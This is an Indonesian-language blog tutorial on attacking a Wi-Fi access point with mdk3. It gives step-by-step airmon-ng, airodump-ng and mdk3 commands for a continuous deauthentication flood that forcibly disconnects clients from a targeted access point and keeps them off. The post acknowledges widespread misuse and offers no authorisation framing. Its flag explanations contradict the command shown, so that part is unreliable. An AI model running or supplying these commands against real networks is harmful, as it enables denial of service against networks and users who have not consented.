Mdk3 tutorial fight your network - GPComp Gadget Mania

Mdk3 tutorial fight your network

Mdk3 tool yang tidak asing lagi dalam pertempuran para pentester, biasa digunakan disaat koneksi internet lambat, sehingga disaat pengguna linux pentest mulai stress, hanya dengan cara ini untuk menetralkannya, tetapi, karena banyaknya sekarang linux pentester beredar, sehingga mdk3 sudah sangatlah populer, ketika tool ini digunakan, banyak dari para pentester menyalah gunakannya, tentu ini pengalaman seorang pemula dalam memegang linux pentes kalau buat yang sudah berpengalaman,
mereka jarang menggunakan hal ini, sehingga tidak heran lagi, kita melihat pembantaian jaringan dimana - mana, nah disini saya akan coba memberikan tutorial sedikit tentang tool mdk3 ini, sifatnya berselancar dijaringan, dan belum ada penangkal dari serangan ini.

Tutorial :
-----------
- Jalankan terlebih terminal linux anda.
- Lalu lakukan aktifasi monitoring jaringan dengan penggunaan perintah airmon-ng.
airmon-ng start wlan0 {enter}

- Lalu lakukan monitoring segera :
airodump-ng mon0 {enter}

- Dan setelah monitoring, maka carilah target yang di inginkan, saya asumsikan target pada accesspoint, contoh saya testingkan ke salah satu accesspoint 54:78:1A:73:92:81.
- Selanjutnya mari kita lakukan penyerangan :
mdk3 mon0 d -m -t 54:78:1A:73:92:81 -T -s 550  {Enter}

- Nah, silahkan rasakan serangan ini, disarankan pengguna harus mendiskonkesikan terlebih dahulu komputernya dari access point, agar tidak terkena serangan sendiri.


Keterangan :
--------------
* d   = Mendiskoneksikan secara paksa client
* -m = mengkick sekaligus tidak mengizinkan lagi pengguna yang sudah terkena untuk konek kembali, dengan syarat mematikan serangan mdk3 agar, user bisa konek kembali.
* -t  = t kecil berfungsi sebagai pengulangan serangan atau replay terus menerus.
* -T =  T besar berfungsi menarget sebuah access point yang di tuju.
* -s  = Menyuruh anda memasukkan value flood yang di inginkan, contoh pada serangan di atas, flood diberikan mulai awal dari 550 hingga tanpa batas.
Next Post Previous Post
No Comment
Add Comment
comment url